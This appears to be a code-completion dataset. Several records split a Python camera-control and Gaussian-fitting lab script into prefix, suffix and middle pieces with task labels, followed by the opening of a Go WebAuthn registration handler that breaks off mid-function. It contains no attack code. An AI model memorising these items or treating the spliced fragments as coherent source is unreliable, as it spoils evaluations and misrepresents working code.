correct_exposure.on_clicked(find_exposure)
stabilize_button.on_clicked(stabilize)
# pause_play.on_clicked(playback)
plot_snapshot.on_clicked(snapshot)
switch_cameras.on_clicked(switch_cam)
set_exposure.on_changed(adjust_exposure)
## Begin Animation ##
_ = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
plt.close(fig)
########## Helper Functions ###############
# noinspection PyPep8Naming
def gaussian1d(x, x0, w0, A, offset):
""" Returns intensity profile of 1d gaussian beam
x0: x-offset
w0: waist of Gaussian beam
A: Amplitude
offset: Global offset
"""
if w0 == 0:
return 0
return A * np.exp(-2 * (x - x0) ** 2 / (w0 ** 2)) + offset
# noinspection PyPep8Naming
def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):
""" Returns intensity profile of trap array
x0_vec: 1-by-ntraps array of x-offsets of traps
wx_vec: 1-by-ntraps array of waists of traps
A_vec: 1-by-ntraps array of amplitudes of traps
offset: global offset
ntraps: Number of traps
"""
array = np.zeros(np.shape(x))
for k in range(ntraps):
array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)
return array + offset
def wrapper_fit_func(x, ntraps, *args):
""" Juggles parameters in order to be able to fit a list of parameters
"""
a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])
offset = args[0][-1]
return gaussianarray1d(x, a, b, c, offset, ntraps)
def guess_image(which_cam, image, ntraps):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.65]
## Image Conditioning ##
margin = 10
threshold = np.max(image)*threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif p < threshold and left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
xdata = np.arange(x_len)
plt.figure()
plt.plot(xdata, peak_vals)
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.6]
margin = 10
threshold = np.max(image) * threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
## Fitting ##
if verbose:
print("Fitting...")
xdata = np.arange(x_len)
popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),
xdata, peak_vals, p0=params0)
if verbose:
print("Fit!")
plt.figure()
plt.plot(xdata, peak_vals) # Data
if iteration:
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit
plt.title("Iteration: %d" % iteration)
else:
plt.title("Final Product")
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
print("Fig_Newton")
trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])
return trap_powers
# noinspection PyProtectedMember
def fix_exposure(cam, slider, verbose=False):
""" Given the opened camera object and the Slider
object connected to the camera's exposure,
adjusts the exposure to just below clipping.
*Binary Search*
"""
margin = 10
exp_t = MAX_EXP / 2
cam._set_exposure(exp_t * u.milliseconds)
time.sleep(0.5)
print("Fetching Frame")
im = cam.latest_frame()
x_len = len(im)
right, left = MAX_EXP, 0
inc = right / 10
for _ in range(10):
## Determine if Clipping or Low-Exposure ##
gap = 255
for i in range(x_len):
if i < margin or x_len - i < margin:
continue
else:
gap = min(255 - max(im[i]), gap)
## Make Appropriate Adjustment ##
if gap == 0:
if verbose:
print("Clipping at: ", exp_t)
right = exp_t
elif gap > 50:
if verbose:
print("Closing gap: ", gap, " w/ exposure: ", exp_t)
left = exp_t
else:
if verbose:
print("Final Exposure: ", exp_t)
return
if inc < 0.01:
exp_t -= inc if gap == 0 else -inc
else:
exp_t = (right + left) / 2
inc = (right - left) / 10
slider.set_val(exp_t)
time.sleep(1)
im = cam.latest_frame()
_run_cam(True, True) | animate | identifier_name |
gui_debugging.py | ## For Cam Control ##
from instrumental import instrument, u
import matplotlib.animation as animation
from matplotlib.widgets import Button, Slider
from scipy.optimize import curve_fit
## Other ##
import time
import matplotlib.pyplot as plt
import numpy as np
from math import sqrt
MAX_EXP = 150
def stabilize_intensity(which_cam, cam, verbose=False):
""" Given a UC480 camera object (instrumental module) and
a number indicating the number of trap objects,
applies an iterative image analysis to individual trap adjustment
in order to achieve a nearly homogeneous intensity profile across traps.
"""
L = 0.5 # Correction Rate
mags = np.ones(12) ### !
ntraps = len(mags)
iteration = 0
while iteration < 5:
iteration += 1
print("Iteration ", iteration)
im = cam.latest_frame()
try:
trap_powers = analyze_image(which_cam, im, ntraps, iteration, verbose)
except (AttributeError, ValueError) as e:
print("No Bueno, error occurred during image analysis:\n", e)
break
mean_power = trap_powers.mean()
rel_dif = 100 * trap_powers.std() / mean_power
print(f'Relative Power Difference: {rel_dif:.2f} %')
if rel_dif < 0.8:
print("WOW")
break
deltaP = [mean_power - P for P in trap_powers]
dmags = [(dP / abs(dP)) * sqrt(abs(dP)) * L for dP in deltaP]
mags = np.add(mags, dmags)
print("Magnitudes: ", mags)
break
# self._update_magnitudes(mags)
_ = analyze_image(im, ntraps, verbose=verbose)
def _run_cam(which_cam, verbose=False):
names = ['ThorCam', 'ChamberCam'] # False, True
## https://instrumental-lib.readthedocs.io/en/stable/uc480-cameras.html ##
cam = instrument(names[which_cam])
## Cam Live Stream ##
cam.start_live_video(framerate=10 * u.hertz)
exp_t = cam._get_exposure()
## Create Figure ##
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
## Animation Frame ##
def animate(i):
if cam.wait_for_frame():
im = cam.latest_frame()
ax1.clear()
ax1.imshow(im)
## Button: Automatic Exposure Adjustment ##
def find_exposure(event):
fix_exposure(cam, set_exposure, verbose)
## Button: Intensity Feedback ##
def stabilize(event): # Wrapper for Intensity Feedback function.
im = cam.latest_frame()
print(analyze_image(which_cam, im, 12, 1, True))
# stabilize_intensity(which_cam, cam, verbose)
def snapshot(event):
im = cam.latest_frame()
guess_image(which_cam, im, 12)
def switch_cam(event):
nonlocal cam, which_cam
cam.close()
which_cam = not which_cam
cam = instrument(names[which_cam])
cam.start_live_video(framerate=10 * u.hertz)
# ## Button: Pause ##
# def playback(event):
# if playback.running:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_STOP)
# playback.running = 0
# else:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_START | M2CMD_CARD_ENABLETRIGGER)
# playback.running = 1
# playback.running = 1
## Slider: Exposure ##
def adjust_exposure(exp_t):
cam._set_exposure(exp_t * u.milliseconds)
## Button Construction ##
axspos = plt.axes([0.56, 0.0, 0.13, 0.05])
axstab = plt.axes([0.7, 0.0, 0.1, 0.05])
# axstop = plt.axes([0.81, 0.0, 0.12, 0.05])
axplot = plt.axes([0.81, 0.0, 0.09, 0.05]) ### !
axswch = plt.axes([0.91, 0.0, 0.09, 0.05])
axspar = plt.axes([0.14, 0.9, 0.73, 0.05])
correct_exposure = Button(axspos, 'AutoExpose')
stabilize_button = Button(axstab, 'Stabilize')
# pause_play = Button(axstop, 'Pause/Play')
plot_snapshot = Button(axplot, 'Plot')
switch_cameras = Button(axswch, 'Switch')
set_exposure = Slider(axspar, 'Exposure', valmin=0.1, valmax=MAX_EXP, valinit=exp_t.magnitude)
correct_exposure.on_clicked(find_exposure) | switch_cameras.on_clicked(switch_cam)
set_exposure.on_changed(adjust_exposure)
## Begin Animation ##
_ = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
plt.close(fig)
########## Helper Functions ###############
# noinspection PyPep8Naming
def gaussian1d(x, x0, w0, A, offset):
""" Returns intensity profile of 1d gaussian beam
x0: x-offset
w0: waist of Gaussian beam
A: Amplitude
offset: Global offset
"""
if w0 == 0:
return 0
return A * np.exp(-2 * (x - x0) ** 2 / (w0 ** 2)) + offset
# noinspection PyPep8Naming
def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):
""" Returns intensity profile of trap array
x0_vec: 1-by-ntraps array of x-offsets of traps
wx_vec: 1-by-ntraps array of waists of traps
A_vec: 1-by-ntraps array of amplitudes of traps
offset: global offset
ntraps: Number of traps
"""
array = np.zeros(np.shape(x))
for k in range(ntraps):
array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)
return array + offset
def wrapper_fit_func(x, ntraps, *args):
""" Juggles parameters in order to be able to fit a list of parameters
"""
a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])
offset = args[0][-1]
return gaussianarray1d(x, a, b, c, offset, ntraps)
def guess_image(which_cam, image, ntraps):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.65]
## Image Conditioning ##
margin = 10
threshold = np.max(image)*threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif p < threshold and left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
xdata = np.arange(x_len)
plt.figure()
plt.plot(xdata, peak_vals)
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.6]
margin = 10
threshold = np.max(image) * threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
## Fitting ##
if verbose:
print("Fitting...")
xdata = np.arange(x_len)
popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),
xdata, peak_vals, p0=params0)
if verbose:
print("Fit!")
plt.figure()
plt.plot(xdata, peak_vals) # Data
if iteration:
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit
plt.title("Iteration: %d" % iteration)
else:
plt.title("Final Product")
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
print("Fig_Newton")
trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])
return trap_powers
# noinspection PyProtectedMember
def fix_exposure(cam, slider, verbose=False):
""" Given the opened camera object and the Slider
object connected to the camera's exposure,
adjusts the exposure to just below clipping.
*Binary Search*
"""
margin = 10
exp_t = MAX_EXP / 2
cam._set_exposure(exp_t * u.milliseconds)
time.sleep(0.5)
print("Fetching Frame")
im = cam.latest_frame()
x_len = len(im)
right, left = MAX_EXP, 0
inc = right / 10
for _ in range(10):
## Determine if Clipping or Low-Exposure ##
gap = 255
for i in range(x_len):
if i < margin or x_len - i < margin:
continue
else:
gap = min(255 - max(im[i]), gap)
## Make Appropriate Adjustment ##
if gap == 0:
if verbose:
print("Clipping at: ", exp_t)
right = exp_t
elif gap > 50:
if verbose:
print("Closing gap: ", gap, " w/ exposure: ", exp_t)
left = exp_t
else:
if verbose:
print("Final Exposure: ", exp_t)
return
if inc < 0.01:
exp_t -= inc if gap == 0 else -inc
else:
exp_t = (right + left) / 2
inc = (right - left) / 10
slider.set_val(exp_t)
time.sleep(1)
im = cam.latest_frame()
_run_cam(True, True) | stabilize_button.on_clicked(stabilize)
# pause_play.on_clicked(playback)
plot_snapshot.on_clicked(snapshot) | random_line_split |
gui_debugging.py | ## For Cam Control ##
from instrumental import instrument, u
import matplotlib.animation as animation
from matplotlib.widgets import Button, Slider
from scipy.optimize import curve_fit
## Other ##
import time
import matplotlib.pyplot as plt
import numpy as np
from math import sqrt
MAX_EXP = 150
def stabilize_intensity(which_cam, cam, verbose=False):
|
def _run_cam(which_cam, verbose=False):
names = ['ThorCam', 'ChamberCam'] # False, True
## https://instrumental-lib.readthedocs.io/en/stable/uc480-cameras.html ##
cam = instrument(names[which_cam])
## Cam Live Stream ##
cam.start_live_video(framerate=10 * u.hertz)
exp_t = cam._get_exposure()
## Create Figure ##
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
## Animation Frame ##
def animate(i):
if cam.wait_for_frame():
im = cam.latest_frame()
ax1.clear()
ax1.imshow(im)
## Button: Automatic Exposure Adjustment ##
def find_exposure(event):
fix_exposure(cam, set_exposure, verbose)
## Button: Intensity Feedback ##
def stabilize(event): # Wrapper for Intensity Feedback function.
im = cam.latest_frame()
print(analyze_image(which_cam, im, 12, 1, True))
# stabilize_intensity(which_cam, cam, verbose)
def snapshot(event):
im = cam.latest_frame()
guess_image(which_cam, im, 12)
def switch_cam(event):
nonlocal cam, which_cam
cam.close()
which_cam = not which_cam
cam = instrument(names[which_cam])
cam.start_live_video(framerate=10 * u.hertz)
# ## Button: Pause ##
# def playback(event):
# if playback.running:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_STOP)
# playback.running = 0
# else:
# spcm_dwSetParam_i32(self.hCard, SPC_M2CMD, M2CMD_CARD_START | M2CMD_CARD_ENABLETRIGGER)
# playback.running = 1
# playback.running = 1
## Slider: Exposure ##
def adjust_exposure(exp_t):
cam._set_exposure(exp_t * u.milliseconds)
## Button Construction ##
axspos = plt.axes([0.56, 0.0, 0.13, 0.05])
axstab = plt.axes([0.7, 0.0, 0.1, 0.05])
# axstop = plt.axes([0.81, 0.0, 0.12, 0.05])
axplot = plt.axes([0.81, 0.0, 0.09, 0.05]) ### !
axswch = plt.axes([0.91, 0.0, 0.09, 0.05])
axspar = plt.axes([0.14, 0.9, 0.73, 0.05])
correct_exposure = Button(axspos, 'AutoExpose')
stabilize_button = Button(axstab, 'Stabilize')
# pause_play = Button(axstop, 'Pause/Play')
plot_snapshot = Button(axplot, 'Plot')
switch_cameras = Button(axswch, 'Switch')
set_exposure = Slider(axspar, 'Exposure', valmin=0.1, valmax=MAX_EXP, valinit=exp_t.magnitude)
correct_exposure.on_clicked(find_exposure)
stabilize_button.on_clicked(stabilize)
# pause_play.on_clicked(playback)
plot_snapshot.on_clicked(snapshot)
switch_cameras.on_clicked(switch_cam)
set_exposure.on_changed(adjust_exposure)
## Begin Animation ##
_ = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
plt.close(fig)
########## Helper Functions ###############
# noinspection PyPep8Naming
def gaussian1d(x, x0, w0, A, offset):
""" Returns intensity profile of 1d gaussian beam
x0: x-offset
w0: waist of Gaussian beam
A: Amplitude
offset: Global offset
"""
if w0 == 0:
return 0
return A * np.exp(-2 * (x - x0) ** 2 / (w0 ** 2)) + offset
# noinspection PyPep8Naming
def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):
""" Returns intensity profile of trap array
x0_vec: 1-by-ntraps array of x-offsets of traps
wx_vec: 1-by-ntraps array of waists of traps
A_vec: 1-by-ntraps array of amplitudes of traps
offset: global offset
ntraps: Number of traps
"""
array = np.zeros(np.shape(x))
for k in range(ntraps):
array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)
return array + offset
def wrapper_fit_func(x, ntraps, *args):
""" Juggles parameters in order to be able to fit a list of parameters
"""
a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])
offset = args[0][-1]
return gaussianarray1d(x, a, b, c, offset, ntraps)
def guess_image(which_cam, image, ntraps):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.65]
## Image Conditioning ##
margin = 10
threshold = np.max(image)*threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif p < threshold and left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
xdata = np.arange(x_len)
plt.figure()
plt.plot(xdata, peak_vals)
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):
""" Scans the given image for the 'ntraps' number of trap intensity peaks.
Then extracts the 1-dimensional gaussian profiles across the traps and
returns a list of the amplitudes.
"""
threshes = [0.5, 0.6]
margin = 10
threshold = np.max(image) * threshes[which_cam]
im = image.transpose()
x_len = len(im)
peak_locs = np.zeros(x_len)
peak_vals = np.zeros(x_len)
## Trap Peak Detection ##
for i in range(x_len):
if i < margin or x_len - i < margin:
peak_locs[i] = 0
peak_vals[i] = 0
else:
peak_locs[i] = np.argmax(im[i])
peak_vals[i] = max(im[i])
## Trap Range Detection ##
first = True
pos_first, pos_last = 0, 0
left_pos = 0
for i, p in enumerate(peak_vals):
if p > threshold:
left_pos = i
elif left_pos != 0:
if first:
pos_first = (left_pos + i) // 2
first = False
pos_last = (left_pos + i) // 2
left_pos = 0
## Separation Value ##
separation = (pos_last - pos_first) / ntraps # In Pixels
## Initial Guesses ##
means0 = np.linspace(pos_first, pos_last, ntraps).tolist()
waists0 = (separation * np.ones(ntraps) / 2).tolist()
ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()
_params0 = [means0, waists0, ampls0, [0.06]]
params0 = [item for sublist in _params0 for item in sublist]
## Fitting ##
if verbose:
print("Fitting...")
xdata = np.arange(x_len)
popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),
xdata, peak_vals, p0=params0)
if verbose:
print("Fit!")
plt.figure()
plt.plot(xdata, peak_vals) # Data
if iteration:
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess
plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit
plt.title("Iteration: %d" % iteration)
else:
plt.title("Final Product")
plt.xlim((pos_first - margin, pos_last + margin))
plt.legend(["Data", "Guess", "Fit"])
plt.show(block=False)
print("Fig_Newton")
trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])
return trap_powers
# noinspection PyProtectedMember
def fix_exposure(cam, slider, verbose=False):
""" Given the opened camera object and the Slider
object connected to the camera's exposure,
adjusts the exposure to just below clipping.
*Binary Search*
"""
margin = 10
exp_t = MAX_EXP / 2
cam._set_exposure(exp_t * u.milliseconds)
time.sleep(0.5)
print("Fetching Frame")
im = cam.latest_frame()
x_len = len(im)
right, left = MAX_EXP, 0
inc = right / 10
for _ in range(10):
## Determine if Clipping or Low-Exposure ##
gap = 255
for i in range(x_len):
if i < margin or x_len - i < margin:
continue
else:
gap = min(255 - max(im[i]), gap)
## Make Appropriate Adjustment ##
if gap == 0:
if verbose:
print("Clipping at: ", exp_t)
right = exp_t
elif gap > 50:
if verbose:
print("Closing gap: ", gap, " w/ exposure: ", exp_t)
left = exp_t
else:
if verbose:
print("Final Exposure: ", exp_t)
return
if inc < 0.01:
exp_t -= inc if gap == 0 else -inc
else:
exp_t = (right + left) / 2
inc = (right - left) / 10
slider.set_val(exp_t)
time.sleep(1)
im = cam.latest_frame()
_run_cam(True, True) | """ Given a UC480 camera object (instrumental module) and
a number indicating the number of trap objects,
applies an iterative image analysis to individual trap adjustment
in order to achieve a nearly homogeneous intensity profile across traps.
"""
L = 0.5 # Correction Rate
mags = np.ones(12) ### !
ntraps = len(mags)
iteration = 0
while iteration < 5:
iteration += 1
print("Iteration ", iteration)
im = cam.latest_frame()
try:
trap_powers = analyze_image(which_cam, im, ntraps, iteration, verbose)
except (AttributeError, ValueError) as e:
print("No Bueno, error occurred during image analysis:\n", e)
break
mean_power = trap_powers.mean()
rel_dif = 100 * trap_powers.std() / mean_power
print(f'Relative Power Difference: {rel_dif:.2f} %')
if rel_dif < 0.8:
print("WOW")
break
deltaP = [mean_power - P for P in trap_powers]
dmags = [(dP / abs(dP)) * sqrt(abs(dP)) * L for dP in deltaP]
mags = np.add(mags, dmags)
print("Magnitudes: ", mags)
break
# self._update_magnitudes(mags)
_ = analyze_image(im, ntraps, verbose=verbose) | identifier_body |
operations.go | /*
Copyright SecureKey Technologies Inc. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package device
import (
"bytes"
"context"
"crypto/tls"
"encoding/json"
"encoding/pem"
"fmt"
"net/http"
"strings"
"github.com/duo-labs/webauthn.io/session"
"github.com/duo-labs/webauthn/protocol"
"github.com/duo-labs/webauthn/webauthn"
ariesstorage "github.com/hyperledger/aries-framework-go/spi/storage"
"github.com/trustbloc/edge-core/pkg/log"
"github.com/trustbloc/edge-agent/pkg/restapi/common"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/cookie"
"github.com/trustbloc/edge-agent/pkg/restapi/common/store/user"
)
// Endpoints.
const (
registerBeginPath = "/register/begin"
registerFinishPath = "/register/finish"
loginBeginPath = "/login/begin"
loginFinishPath = "/login/finish"
)
// Stores.
const (
deviceStoreName = "edgeagent_device_trx"
userSubCookieName = "user_sub"
deviceCookieName = "device_user"
)
var logger = log.New("edge-agent/device-registration")
// Config holds all configuration for an Operation.
type Config struct {
Storage *StorageConfig
WalletDashboard string
TLSConfig *tls.Config
Cookie *cookie.Config
Webauthn *webauthn.WebAuthn
HubAuthURL string
}
// StorageConfig holds storage config.
type StorageConfig struct {
Storage ariesstorage.Provider
SessionStore ariesstorage.Provider
}
type stores struct {
users *user.Store
cookies cookie.Store
storage ariesstorage.Store
session *session.Store
}
type httpClient interface {
Do(req *http.Request) (*http.Response, error)
}
// Operation implements OIDC operations.
type Operation struct {
store *stores
walletDashboard string
tlsConfig *tls.Config
httpClient httpClient
webauthn *webauthn.WebAuthn
hubAuthURL string
}
// New returns a new Operation.
func New(config *Config) (*Operation, error) {
op := &Operation{
store: &stores{
cookies: cookie.NewStore(config.Cookie),
},
tlsConfig: config.TLSConfig,
httpClient: &http.Client{Transport: &http.Transport{TLSClientConfig: config.TLSConfig}},
webauthn: config.Webauthn,
walletDashboard: config.WalletDashboard,
hubAuthURL: config.HubAuthURL,
}
var err error
protocol.RegisterAttestationFormat("apple", ValidateAppleAttestation)
op.store.storage, err = store.Open(config.Storage.Storage, deviceStoreName)
if err != nil {
return nil, fmt.Errorf("failed to open store: %w", err)
}
op.store.session, err = session.NewStore()
if err != nil {
return nil, fmt.Errorf("failed to create web auth protocol session store: %w", err)
}
op.store.users, err = user.NewStore(config.Storage.Storage)
if err != nil {
return nil, fmt.Errorf("failed to open users store: %w", err)
}
return op, nil
}
// GetRESTHandlers get all controller API handler available for this service.
func (o *Operation) GetRESTHandlers() []common.Handler {
return []common.Handler{
common.NewHTTPHandler(registerBeginPath, http.MethodGet, o.beginRegistration),
common.NewHTTPHandler(registerFinishPath, http.MethodPost, o.finishRegistration),
common.NewHTTPHandler(loginBeginPath, http.MethodGet, o.beginLogin),
common.NewHTTPHandler(loginFinishPath, http.MethodPost, o.finishLogin),
}
}
func (o *Operation) beginRegistration(w http.ResponseWriter, r *http.Request) {
logger.Debugf("handling device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
device := NewDevice(userData)
webAuthnUser := protocol.UserEntity{
ID: device.WebAuthnID(),
DisplayName: device.WebAuthnDisplayName(),
CredentialEntity: protocol.CredentialEntity{
Name: device.WebAuthnName(),
},
}
registerOptions := func(credCreationOpts *protocol.PublicKeyCredentialCreationOptions) {
credCreationOpts.User = webAuthnUser
credCreationOpts.CredentialExcludeList = device.CredentialExcludeList()
credCreationOpts.Attestation = protocol.PreferDirectAttestation
}
// generate PublicKeyCredentialCreationOptions, session data
credentialParams, sessionData, err := o.webauthn.BeginRegistration(
device,
registerOptions,
)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to begin registration %s", err.Error())
return
}
// store session data as marshaled JSON
err = o.store.session.SaveWebauthnSession(userData.Sub, sessionData, r, w)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to save web auth session %s", err.Error())
return
}
jsonResponse(w, credentialParams, http.StatusOK)
logger.Debugf("Registration begins")
}
func (o *Operation) finishRegistration(w http.ResponseWriter, r *http.Request) { // nolint:funlen // not clean to split
logger.Debugf("handling finish device registration: %s", r.URL.String())
userData, canProceed := o.getUserData(w, r, userSubCookieName)
if !canProceed {
return
}
sessionData, err := o.store.session.GetWebauthnSession(userData.Sub, r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to get web auth session: %s", err.Error())
return
}
device := NewDevice(userData)
// unfold webauthn.FinishRegistration, to access parsedResponse
parsedResponse, err := protocol.ParseCredentialCreationResponse(r)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: parsing ccr: %#v", err)
return
}
credential, err := o.webauthn.CreateCredential(device, sessionData, parsedResponse)
if err != nil {
common.WriteErrorResponsef(w, logger,
http.StatusInternalServerError, "failed to finish registration: cred: %#v", err)
return
}
deviceCerts, ok := parsedResponse.Response.AttestationObject.AttStatement["x5c"].([]interface{})
if ok && len(deviceCerts) > 0 {
